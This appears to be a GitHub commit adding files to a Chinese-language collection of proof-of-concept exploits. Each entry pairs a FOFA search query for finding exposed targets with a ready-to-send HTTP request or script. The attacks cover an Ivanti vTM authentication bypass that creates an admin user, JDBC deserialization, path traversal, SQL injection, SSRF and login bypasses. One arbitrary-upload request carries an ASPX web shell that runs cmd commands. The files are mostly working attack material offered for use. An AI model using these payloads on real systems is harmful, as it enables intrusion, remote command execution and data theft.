-
Notifications
You must be signed in to change notification settings - Fork 1k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
15 changed files
with
415 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
# EOVA未授权doInit接口存在反序列化漏洞 | ||
|
||
EOVA存在JDBC反序列化漏洞,由于JDBC连接mysql服务器的时候,参数完全可控,可传入恶意配置和恶意mysql服务器地址,导致反序列化漏洞。攻击者可利用该漏洞执行任意命令。 | ||
|
||
## fofa | ||
|
||
```yaml | ||
icon_hash="-1699356011" | ||
``` | ||
|
||
## poc | ||
|
||
```javascript | ||
POST /doInit HTTP/1.1 | ||
Host: | ||
Sec-Fetch-Dest: document | ||
Cache-Control: max-age=0 | ||
Sec-Fetch-User: ?1 | ||
Sec-Fetch-Site: none | ||
sec-ch-ua-mobile: ?0 | ||
sec-ch-ua-platform: "Windows" | ||
Accept-Language: zh-CN,zh;q=0.9 | ||
Sec-Fetch-Mode: navigate | ||
Cookie: JSESSIONID=1diwaoe2lud2k1w5bzj9gy0r9v; _jfinal_captcha=ec1807bb391d443f9730b7b18384157a | ||
sec-ch-ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127" | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7 | ||
Accept-Encoding: gzip, deflate, br, zstd | ||
Upgrade-Insecure-Requests: 1 | ||
Content-Type: application/x-www-form-urlencoded | ||
|
||
ip=127.0.0.1:3333%2Ftest%3FautoDeserialize=true%26statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor%26user=URLDNS%26Yu9=Yu9%23&port=&username=root&password=123456 | ||
``` | ||
|
||
|
||
|
||
## 漏洞来源 | ||
|
||
- https://forum.butian.net/article/560 |
53 changes: 53 additions & 0 deletions
53
Ivanti/Ivanti-Virtual-Traffic-Manager存在身份验证绕过漏洞(CVE-2024-7593).md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,53 @@ | ||
# Ivanti-Virtual-Traffic-Manager存在身份验证绕过漏洞(CVE-2024-7593) | ||
|
||
Ivanti Virtual Traffic Manager (vTM)多个版本存在身份验证绕过漏洞(CVE-2024-7593),由于身份验证算法的错误实现,导致未经身份验证的远程攻击者绕过面向互联网的vTM管理控制台上的身份验证,未授权创建管理用户。 | ||
|
||
## fofa | ||
|
||
```javascript | ||
"Pulse Secure vTM Administration Server" | ||
``` | ||
|
||
## poc | ||
|
||
```python | ||
import requests | ||
|
||
# Set to target address | ||
admin_portal = 'https://1.1.1.1:9090' | ||
|
||
# User to create | ||
new_admin_name = 'ldwkadmin' | ||
new_admin_password = 'ldwkadmin1234' | ||
|
||
requests.packages.urllib3.disable_warnings() | ||
session = requests.Session() | ||
|
||
# Setting 'error' bypasses access control for wizard.fcgi. | ||
# wizard.fcgi can load any section in the web interface. | ||
params = { 'error': 1, | ||
'section': 'Access Management:LocalUsers' } | ||
|
||
# Create new user request | ||
# _form_submitted to bypass CSRF | ||
data = { '_form_submitted': 'form', | ||
'create_user': 'Create', | ||
'group': 'admin', | ||
'newusername': new_admin_name, | ||
'password1': new_admin_password, | ||
'password2': new_admin_password } | ||
|
||
# Post request | ||
r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False) | ||
|
||
# View response | ||
content = r.content.decode('utf-8') | ||
print(content) | ||
|
||
if r.status_code == 200 and '<title>2<' in content: | ||
print("New user request sent") | ||
print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'") | ||
else: | ||
print("Unable to create new user") | ||
``` | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
# 中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞 | ||
|
||
中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞,任意文件下载漏洞可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。 | ||
|
||
## fofa | ||
|
||
```javascript | ||
title="ZSRV2路由器Web管理系统" | ||
``` | ||
|
||
## poc | ||
|
||
``` | ||
GET /css//../../../../../../../../etc/passwd HTTP/1.1 | ||
Host: {{Hostname}} | ||
``` | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,47 @@ | ||
# 浪潮云财务系统UploadListFile存在任意文件上传漏洞 | ||
|
||
浪潮云财务系统UploadListFile存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 | ||
|
||
## fofa | ||
|
||
```javascript | ||
body="/cwbase/web/scripts/jquery.js" || icon_hash="-1341069524" | ||
``` | ||
|
||
## poc | ||
|
||
```javascript | ||
POST /cwbase/EP/ListContent/UploadListFile.ashx?uptype=attslib&keyid=1&key1=1&key2=1 HTTP/1.1 | ||
Host: | ||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 | ||
Accept: / | ||
Accept-Encoding: gzip, deflate, br | ||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 | ||
Connection: close | ||
Content-Type: multipart/form-data; boundary=---------------------------rww5upkbw6ctf0tu5hye | ||
|
||
-----------------------------rww5upkbw6ctf0tu5hye | ||
Content-Disposition: form-data; name="file"; filename="../../../../../../rce.aspx" | ||
Content-Type: image/png | ||
|
||
<%@ Page Language="Jscript" validateRequest="false" %> | ||
<% | ||
var c=new System.Diagnostics.ProcessStartInfo("cmd"); | ||
var e=new System.Diagnostics.Process(); | ||
var out:System.IO.StreamReader,EI:System.IO.StreamReader; | ||
c.UseShellExecute=false; | ||
c.RedirectStandardOutput=true; | ||
c.RedirectStandardError=true; | ||
e.StartInfo=c; | ||
c.Arguments="/c " + Request.Item["cmd"]; | ||
e.Start(); | ||
out=e.StandardOutput; | ||
EI=e.StandardError; | ||
e.Close(); | ||
Response.Write(out.ReadToEnd() + EI.ReadToEnd()); | ||
System.IO.File.Delete(Request.PhysicalPath); | ||
Response.End();%> | ||
-----------------------------rww5upkbw6ctf0tu5hye-- | ||
``` | ||
|
||
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408312352567.png) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
# 珠海新华通软件股份有限公司云平台存在登录绕过漏洞 | ||
|
||
珠海新华通软件股份有限公司云平台存在登录绕过漏洞,漏洞允许攻击者通过简单操作,如添加特定Cookie或修改请求参数,绕过身份验证直接访问后台,从而对系统安全构成严重威胁。 | ||
|
||
## fofa | ||
|
||
```javascript | ||
icon_hash="513304261" | ||
``` | ||
|
||
## POC | ||
|
||
```javascript | ||
POST /Main/Desktop/Default.aspx HTTP/1.1 | ||
Accept: */* | ||
Accept-Encoding: gzip, deflate | ||
Accept-Language: zh-CN,zh;q=0.9 | ||
Connection: keep-alive | ||
Content-Length: 166 | ||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | ||
Cookie: ASP.NET_SessionId=x01ftldfm5dwbbo1tx1ne1kv; #_SSO_Login_UserID=admin; #_SSO_Login_UserID_Guid= | ||
Host: | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | ||
X-Requested-With: XMLHttpRequest | ||
``` | ||
请求/Main/Desktop/Default.aspx 加cookie认证`#_SSO_Login_UserID=admin ` 即可绕过登录进入后台 | ||
![image-20240831234213408](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408312342494.png) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
# 用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞 | ||
|
||
用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 | ||
|
||
## fofa | ||
|
||
```java | ||
app="用友-U8-Cloud" | ||
title=="U8C" | ||
``` | ||
|
||
## poc | ||
|
||
```javascript | ||
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.RepAddToTaskAction&method=save&taskSelected=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1 | ||
Host: | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 | ||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 | ||
Connection: close | ||
``` | ||
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409010005308.png) | ||
## 漏洞来源 | ||
- [用友U8 Cloud RepAddToTaskAction SQL注入漏洞复现-CSDN博客](https://axsec.blog.csdn.net/article/details/141719740?spm=1001.2014.3001.5502) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
# 短剧影视小程序前台base64_image_content任意文件上传漏洞 | ||
|
||
**注意 这里需要登录,普通用户权限即可 访问 /index/user 可直接注册登录。** | ||
|
||
## fofa | ||
|
||
```yaml | ||
"/VwmRIfEYDH.php" | ||
``` | ||
|
||
## poc | ||
|
||
```javascript | ||
POST /api/user/avatar HTTP/1.1 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | ||
Accept-Encoding: gzip, deflate | ||
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: max-age=0 | ||
Connection: keep-alive | ||
Content-Length: 73Content-Type: application/x-www-form-urlencoded | ||
Cookie: PHPSESSID=qt0rrvopobbbvibu6f8p9lr42 | ||
rHost: 127.0.0.1 | ||
Origin: http://127.0.0.1 | ||
Referer: http://127.0.0.1/api/user/avatar | ||
Upgrade-Insecure-Requests: 1 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | ||
base64=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg== | ||
``` | ||
![image-20240902102758828](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409021027916.png) | ||
## 漏洞来源 | ||
- https://mp.weixin.qq.com/s/3WYJzQnjl8hP7oXVZUEQuA |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
# 短剧影视小程序前台juhecurl任意文件读取漏洞 | ||
|
||
|
||
|
||
## fofa | ||
|
||
```yaml | ||
"/VwmRIfEYDH.php" | ||
``` | ||
|
||
## poc | ||
|
||
```javascript | ||
GET /api/ems/juhecurl?url=file:///etc/passwd HTTP/1.1 | ||
Host: 127.0.0.1 | ||
Cache-Control: max-age=0 | ||
Upgrade-Insecure-Requests: 1 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
Accept-Encoding: gzip, deflate | ||
Accept-Language: zh-CN,zh;q=0.9 | ||
Connection: close | ||
``` | ||
![image-20240902102433044](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409021024146.png) | ||
![image-20240902102440030](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409021024087.png) | ||
## 漏洞来源 | ||
- https://mp.weixin.qq.com/s/3WYJzQnjl8hP7oXVZUEQuA |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
# 短剧影视小程序前台未授权漏洞 | ||
|
||
**在 /api/controller/Index.php 控制器的index方法中,很明显地存在 where 查询网站信息及User表中的字段,并且将所有用户枚举出来,且因为 $noNeedLogin = ['*'] 导致所有接口都无权限验证.** | ||
|
||
## fofa | ||
|
||
```yaml | ||
"/VwmRIfEYDH.php" | ||
``` | ||
|
||
## poc | ||
|
||
```javascript | ||
POST /api/index HTTP/1.1 | ||
Host: 127.0.0.1 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | ||
|
||
``` | ||
|
||
![image-20240902103321159](C:/Users/26927/AppData/Roaming/Typora/typora-user-images/image-20240902103321159.png) | ||
|
||
|
||
|
||
## 漏洞来源 | ||
|
||
- https://mp.weixin.qq.com/s/3WYJzQnjl8hP7oXVZUEQuA |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
# 某仿soul欲音社交系统存在任意文件读取漏洞 | ||
|
||
位于 /application/api/controller/upload.php 控制器中的tobase64 方法通过传入file参数 然后通过fopen直接读取任意文件,然后输出base64编码后的文件. | ||
|
||
## fofa | ||
|
||
```javascript | ||
"/public/style/admin/js/jquery.min.js" | ||
``` | ||
|
||
## poc | ||
|
||
```php | ||
GET /api/upload/tobase64?file=conn.php HTTP/1.1 | ||
Host: 127.0.0.1 | ||
Cache-Control: max-age=0 | ||
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows" | ||
Upgrade-Insecure-Requests: 1 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 | ||
``` | ||
|
||
![image-20240902103855273](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409021038369.png) | ||
|
||
## 漏洞来源 | ||
|
||
- https://mp.weixin.qq.com/s/SuunBk1lnphYNgixyWegRg | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
# 紫光电子档案管理系统selectFileRemote存在SQL注入漏洞 | ||
|
||
紫光电子档案管理系统selectFileRemote存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 | ||
|
||
## fofa | ||
|
||
```javascript | ||
body="www.unissoft.com" | ||
``` | ||
|
||
## poc | ||
|
||
```javascript | ||
POST /Archive/ErecordManage/selectFileRemote HTTP/1.1 | ||
Host: {{Hostname}} | ||
Accept: */* Accept-Encoding: gzip, deflate | ||
Connection: close | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 | ||
Content-Type: application/x-www-form-urlencoded | ||
userID=admin&fondsid=1&comid=1' | ||
``` | ||
Oops, something went wrong.